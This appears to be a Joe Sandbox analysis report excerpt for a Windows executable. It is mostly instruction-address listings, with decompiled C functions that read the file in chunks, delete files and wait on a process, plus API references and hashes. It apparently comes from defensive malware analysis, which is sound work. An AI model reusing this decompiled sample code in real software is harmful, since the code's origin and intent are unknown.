                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40f692
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                                                              0x00403489
                                                                                              0x0040349c
                                                                                              0x004034a1
                                                                                              0x004035d1
                                                                                              0x004035d3
                                                                                              0x00000000
                                                                                              0x004035d9
                                                                                              0x004034ad
                                                                                              0x004034c0
                                                                                              0x004034c6
                                                                                              0x004034cc
                                                                                              0x004034d7
                                                                                              0x004034dc
                                                                                              0x004034e1
                                                                                              0x004034e9
                                                                                              0x004034eb
                                                                                              0x004034eb
                                                                                              0x004034f4
                                                                                              0x004034fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403501
                                                                                              0x00403507
                                                                                              0x0040350d
                                                                                              0x00000000
                                                                                              0x00403513
                                                                                              0x00403519
                                                                                              0x00403539
                                                                                              0x0040353e
                                                                                              0x00403543
                                                                                              0x00403549
                                                                                              0x0040354f
                                                                                              0x00403559
                                                                                              0x00403560
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403562
                                                                                              0x00403568
                                                                                              0x0040356a
                                                                                              0x0040358d
                                                                                              0x00403593
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403595
                                                                                              0x00403597
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403599
                                                                                              0x00403599
                                                                                              0x004035ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00403574
                                                                                              0x0040357b
                                                                                              0x004035c8
                                                                                              0x004035ce
                                                                                              0x004035ce
                                                                                              0x00000000
                                                                                              0x004035ce
                                                                                              0x0040357d
                                                                                              0x00403583
                                                                                              0x00403589
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x004035cc
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer$CountTick
                                                                                              • String ID:
                                                                                              • API String ID: 1092082344-0
                                                                                              • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                              • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                              0x00405d2d
                                                                                              0x00405d38
                                                                                              0x00405d3d
                                                                                              0x00405d6d
                                                                                              0x00000000
                                                                                              0x00405d6d
                                                                                              0x00405d44
                                                                                              0x00405d45
                                                                                              0x00405d4f
                                                                                              0x00405d47
                                                                                              0x00405d47
                                                                                              0x00405d47
                                                                                              0x00405d57
                                                                                              0x00405d63
                                                                                              0x00405d67
                                                                                              0x00405d67
                                                                                              0x00000000
                                                                                              0x00405d59
                                                                                              0x00000000
                                                                                              0x00405d5b

                                                                                              APIs
                                                                                                • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                              • String ID:
                                                                                              • API String ID: 1655745494-0
                                                                                              • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                              • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                              • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                              • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                                                              0x00406af1
                                                                                              0x00406b08
                                                                                              0x00406afc
                                                                                              0x00406b06
                                                                                              0x00406b06
                                                                                              0x00406b13
                                                                                              0x00406b1f

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2567322000-0
                                                                                              • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                              • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                              • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                              • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                                                              0x00403375
                                                                                              0x0040337e
                                                                                              0x00403387
                                                                                              0x0040338b
